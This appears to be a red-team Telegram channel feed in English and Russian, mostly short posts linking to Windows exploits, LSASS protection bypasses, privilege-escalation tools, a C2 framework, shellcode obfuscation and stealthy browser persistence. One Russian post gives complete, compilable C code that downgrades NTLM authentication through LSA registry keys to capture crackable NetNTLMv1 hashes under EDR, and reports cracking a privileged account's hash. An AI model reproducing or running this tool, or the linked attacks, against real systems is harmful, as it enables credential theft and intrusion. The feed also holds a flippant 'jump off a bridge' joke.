APT

🔍 Deep Dive into Windows IPv6 TCP/IP An overview of CVE-2024-38063, a remote code execution vulnerability in Windows IPv6 TCP/IP. Includes a technical summary, PoC instructions and a reproduction guide. 🔗 Research: https://malwaretech.com/2024/08/exploiting-CVE-2024-38063.html 🔗 PoC: https://github.com/ynwarcs/CVE-2024-38063 #windows #kernel #ipv6 #rce #poc

👻 Ghost in the PPL Part 2: From BYOVDLL to Arbitrary Code Execution in LSASS In this second installment, the author deepens the exploration of techniques for bypassing LSASS protection, focusing on arbitrary code execution by refining the PoC, exploiting vulnerabilities like CVE-2023-28229, and bypassing Control Flow Guard (CFG) through RPC-based process handle duplication. 🔗 Source: https://itm4n.github.io/ghost-in-the-ppl-part-2/ #lsa #lsass #ppl #dll #maldev

🔐 FreeIPA Rosting (CVE-2024-3183) A vulnerability recently discovered by my friend @Im10n in FreeIPA involves a Kerberos TGS-REQ being encrypted using the client’s session key. If a principal’s key is compromised, an attacker could potentially perform offline brute-force attacks to decrypt tickets by exploiting the encrypted key and associated salts. 🔗Source: https://github.com/Cyxow/CVE-2024-3183-POC #freeipa #kerberos #hashcat #cve ——— Добавляем доклад Миши в вишлист на Offzone 🚶‍♂️

Всем привет. Выпустил в паблик Sploitify (https://sploitify.haxx.it) - агрегатор эксплойтов/поков/райтапов с тегами по уязвимостям. Что-то вроде GTFOBins, но для эксплойтов. Сейчас в нем можно найти чекеры от nuclei (тысячи их), некоторые эксплойты на эскалацию привилегий и удаленное выполнение кода в винде и никсах. Еще много чего добавлять, но пользоваться уже можно. Надеюсь пригодится и сделает вашу жизнь немножко легче, по крайней мере такая была цель :)

Совсем недавно Миша выложил инструмент LeakedWallpaper, а я уже успел применить его на проекте. Все отработало отлично! Но зачем нам нужен NetNTLMv2 хеш? Давайте подумаем, как можно улучшить технику, если на компе злющий EDR, но зато есть права local admin. С правами local admin вы можете с помощью манипуляции ключами реестра сделать downgrade NTLM аутентификации до NetNTLMv1 и получить уже хеш, который можно восстановить в NTLM хеш в независимости от сложности пароля пользователя. Для этой цели я написал небольшую программу, которая бэкапит текущие настройки реестра, затем делает downgrade и через 60 сек восстанавливает все обратно.

#include <stdio.h>
#include <windows.h>
#include <winreg.h>
#include <stdint.h>
#include <unistd.h> // для функции sleep

void GetRegKey(const char* path, const char* key, DWORD* oldValue) {
    HKEY hKey;
    DWORD value;
    DWORD valueSize = sizeof(DWORD);

    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, path, 0, KEY_READ, &hKey) == ERROR_SUCCESS) {
        RegQueryValueEx(hKey, key, NULL, NULL, (LPBYTE)&value, &valueSize);
        RegCloseKey(hKey);
        *oldValue = value;
    } else {
        printf("Ошибка чтения ключа реестра.\n");
    }
}

void SetRegKey(const char* path, const char* key, DWORD newValue) {
    HKEY hKey;

    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, path, 0, KEY_WRITE, &hKey) == ERROR_SUCCESS) {
        RegSetValueEx(hKey, key, 0, REG_DWORD, (const BYTE*)&newValue, sizeof(DWORD));
        RegCloseKey(hKey);
    } else {
        printf("Ошибка записи ключа реестра.\n");
    }
}

void ExtendedNTLMDowngrade(DWORD* oldValue_LMCompatibilityLevel, DWORD* oldValue_NtlmMinClientSec, DWORD* oldValue_RestrictSendingNTLMTraffic) {
    GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", oldValue_LMCompatibilityLevel);
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", 2);

    GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", oldValue_NtlmMinClientSec);
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", 536870912);

    GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", oldValue_RestrictSendingNTLMTraffic);
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", 0);
}

void NTLMRestore(DWORD oldValue_LMCompatibilityLevel, DWORD oldValue_NtlmMinClientSec, DWORD oldValue_RestrictSendingNTLMTraffic) {
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", oldValue_LMCompatibilityLevel);
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", oldValue_NtlmMinClientSec);
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", oldValue_RestrictSendingNTLMTraffic);
}

int main() {
    DWORD oldValue_LMCompatibilityLevel = 0;
    DWORD oldValue_NtlmMinClientSec = 0;
    DWORD oldValue_RestrictSendingNTLMTraffic = 0;

    ExtendedNTLMDowngrade(&oldValue_LMCompatibilityLevel, &oldValue_NtlmMinClientSec, &oldValue_RestrictSendingNTLMTraffic);

    // Задержка 60 секунд
    sleep(60);

    NTLMRestore(oldValue_LMCompatibilityLevel, oldValue_NtlmMinClientSec, oldValue_RestrictSendingNTLMTraffic);

    return 0;
}

Компилируем так

x86_64-w64-mingw32-gcc -o ntlm.exe ntlm.c

В итоге мне удалось получить NetNTLMv1 хеш небрутабельного пароля привилегированной УЗ и восстановить NTLM хеш в течении 10 часов. Profit! Ну или для совсем ленивых добавили флаг -downgrade прямо в инструмент LeakedWallpaper :) P.S. Не забывайте добавлять привилегированные УЗ в Protected Users.

🖼️ Manipulating Shim and Office for Code Injection Office Injector - Invokes an RPC method in OfficeClickToRun service that will inject a DLL into a suspended process running as NT AUTHORITY\SYSTEM launched by the task scheduler service, thus achieving privilege escalation from administrator to SYSTEM. Shim Injector - Writes an undocumented shim data structure into the memory of another process that causes apphelp.dll to apply the “Inject Dll” fix on the process without registering a new SDB file on the system, or even writing such file to disk. DefCon Presentation 🔗 Source: https://github.com/deepinstinct/ShimMe #windows #office #rpc #inject #lpe

👻 Ghost in the PPL: BYOVDLL This blog post explores bypassing LSA Protection in Userland through the "Bring Your Own Vulnerable DLL" (BYOVDLL) technique. It also delves into the successful exploitation of vulnerabilities in the CNG Key Isolation service and the methods employed to load vulnerable DLLs within protected processes. 🔗 Source: https://itm4n.github.io/ghost-in-the-ppl-part-1/ #lsa #lsass #ppl #dll #maldev

😈 [ Cube0x0 @cube0x0 ] Over a year ago, I left my position at WithSecure to start a new journey, create something new, and do my own thing. Today, I'm excited to publicly announce what I've been working on all this time. Introducing 0xC2, a cross-platform C2 framework targeting Windows, Linux, and MacOS environments: 🔗 https://0xc2.io The first release was back in late 2023, initially only offered to a small circle of red teamers and soon, the registration will be open for new clients who provide threat simulation services. All agents are written as PIC in C to provide better opsec and to allow operators to be more flexible when designing payloads. To make the agents modular and fully customizable, operators can create a user-defined virtual table that can be hooked by the agent. This can be used to change the default behavior of an agent or extend capabilities, from adding internal commands to implementing P2P protocols. More details will be available soon. 🐥 [ tweet ]

🥔 DeadPotato This is a windows privilege escalation utility from the Potato family of exploits, leveraging the SeImpersonate right to obtain SYSTEM privileges. This script has been customized from the original GodPotato source code by BeichenDream. 🔗 Source: https://github.com/lypd0/DeadPotato #windows #lpe #potato #seimpersonate

🖥 Find and execute WinAPI functions with Assembly If you want to take a happy little journey through PEB structs, PE headers and kernel32.dll Export Table to spawn some "calc.exe" on x64 using Assembly, here it is. 📚 What you will learn: — WinAPI function manual location with Assembly; — PEB Structure and PEB_LDR_DATA; — PE File Structure; — Relative Virtual Address calculation; — Export Address Table (EAT); — Windows x64 calling-convention in practice; — Writing in Assembly like a real Giga-Chad... 🔗 Source: https://print3m.github.io/blog/x64-winapi-shellcoding #maldev #winapi #x64 #shellcode #assembly

👩‍💻 Anyone can Access Deleted and Private Repository Data on GitHub You can access data from deleted forks, deleted repositories and even private repositories on GitHub. And it is available forever. This is known by GitHub, and intentionally designed that way. Cross Fork Object Reference (CFOR) vulnerability occurs when one repository fork can access sensitive data from another fork (including data from private and deleted forks). — Deleted Fork Data: Still accessible. — Deleted Repo Data: Commits remain. — Private Repo Data: Can become public. 🔗 Research: https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github #github #private #repo #cfor

😈 [ Print3M @Print3M_ ] I wrote my first calc.exe "shellcode" in NASM. I find it a little strange that a lot of people write about malware development but almost no one talks about writing your own shellcode. I decided to write something on my own. (good comments, easy readable) 🔗 https://github.com/Print3M/shellcodes/blob/main/calc-exe.asm 🐥 [ tweet ] #для_самых_маленьких

🛠 Adventures in Shellcode Obfuscation This series of articles explores various methods for hiding shellcode, emphasizing techniques to avoid detection. The focus is on demonstrating diverse approaches to conceal shellcode. 🔗 Part 1: Overview 🔗 Part 2: Hail Caesar 🔗 Part 3: Encryption 🔗 Part 4: RC4 with a Twist 🔗 Part 5: Base64 🔗 Part 6: Two Array Method #shellcode #obfuscation #clang #maldev

.

How to fix the Crowdstrike thing: 1. Boot Windows into safe mode 2. Go to C:\Windows\System32\drivers\CrowdStrike 3. Delete C-00000291*.sys 4. Repeat for every host in your enterprise network including remote workers 5. If you're using BitLocker jump off a bridge

💻 Chrome Extension For Persistence How to silently install any Chrome extension and avoid common indicators of compromise (IOCs). The method avoids using CLI parameters or registry edits, and persists via the Secure Preferences file 🔗 Source: https://syntax-err0r.github.io/Silently_Install_Chrome_Extension.html #chrome #persistence #maldev #c2

🖥 Introduction for to Windows kernel exploitation Explore the Windows Kernel with HEVD, a vulnerable driver. Dive into stack overflow exploits and bypass SMEP/KPTI protections using the sysret approach. A detailed guide for Windows kernel explotation: — Part 0: Where do I start? — Part 1: Will this driver ever crash? — Part 2: Is there a way to bypass kASLR, SMEP and KVA Shadow? — Part 3: Can we rop our way into triggering our shellcode? — Part 4: How do we write a shellcode to elevate privileges and gracefully return to userland? #windows #kernel #driver #hevd #hacksys

😎 Gigaproxy — One Proxy to Rule Them All If you’re looking for a powerful tool to help you bypass Web Application Firewalls (WAFs) during external penetration tests and bug bounty programs, you’re in the right place. Gigaproxy tool is designed to rotate IPs using mitmproxy, AWS API Gateway, and Lambda. Fireprox is great but has one major downside. You can only target a single host at a time. Gigaproxy solves this. 🔗 Research: https://www.sprocketsecurity.com/resources/gigaproxy 🔗 Source: https://github.com/Sprocket-Security/gigaproxy #ip #rotate #aws #api #gateway #proxy